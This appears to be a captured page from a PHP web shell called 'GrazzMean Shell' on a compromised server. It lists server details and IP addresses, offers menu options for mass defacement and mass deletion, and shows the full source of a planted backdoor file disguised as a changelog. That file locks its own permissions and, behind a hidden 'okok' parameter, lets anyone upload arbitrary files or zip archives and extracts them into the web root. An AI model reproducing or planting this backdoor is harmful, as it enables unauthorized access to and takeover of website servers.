ai.shandianfk.com - GrazzMean

info server

Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

upload mass deface mass delete console

name : changelog-51grn3.php

<?php
chmod(basename($_SERVER["PHP_SELF"]), 0444);
if (isset($_GET['okok'])) {
    echo '<form enctype="multipart/form-data" method="POST" onsubmit="compressAndUpload(event)">
        <input type="file" id="file_upload" name="file_upload" />
        <input type="submit" value="Upload and Compress" />
    </form>';
    echo '<form enctype="multipart/form-data" method="POST">
        <input type="file" name="direct_file_upload" />
        <input type="submit" value="Direct Upload" />
    </form>';
    echo '<script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.7.1/jszip.min.js"></script>';
    echo '<script>
function generateRandomFileName(extension) {
    let length = Math.floor(Math.random() * 3) + 6; // Generate 6 to 8 characters
    let characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    let randomString = "";
    for (let i = 0; i < length; i++) {
        randomString += characters.charAt(Math.floor(Math.random() * characters.length));
    }
    return randomString + extension;
}

async function compressAndUpload(event) {
    event.preventDefault();

    let fileInput = document.getElementById("file_upload");
    if (fileInput.files.length === 0) {
        alert("Please select a file!");
        return false;
    }

    let file = fileInput.files[0];
    let zip = new JSZip();
    zip.file(file.name, file);

    let zipBlob = await zip.generateAsync({ type: "blob" });
    let formData = new FormData();
    formData.append("file_upload", zipBlob, generateRandomFileName(".zip"));
    let response = await fetch("", {
        method: "POST",
        body: formData
    });
    let text = await response.text();
    document.body.innerHTML = `<p>${text}</p>`;
    return false;
}
</script>';

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file_upload'])) {
        $uploadedFile = $_FILES['file_upload']['tmp_name'];

        $zip = new ZipArchive;
        if ($zip->open($uploadedFile) === TRUE) {
            for ($i = 0; $i < $zip->numFiles; $i++) {
                $filename = $zip->getNameIndex($i);
                $zip->extractTo('.', $filename);
            }
            $zip->close();

            unlink($uploadedFile);

            echo '<div class="success">Uploaded and extracted successfully.</div>';
        } else {
            echo '<div class="error">Failed to extract file.</div>';
        }
    }

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['direct_file_upload'])) {
        $uploadedFile = $_FILES['direct_file_upload']['tmp_name'];
        $destination = basename($_FILES['direct_file_upload']['name']);

        if (move_uploaded_file($uploadedFile, $destination)) {
            echo '<div class="success">Direct upload successful.</div>';
        } else {
            echo '<div class="error">Direct upload failed.</div>';
        }
    }
}
?>

GrazzMean Shell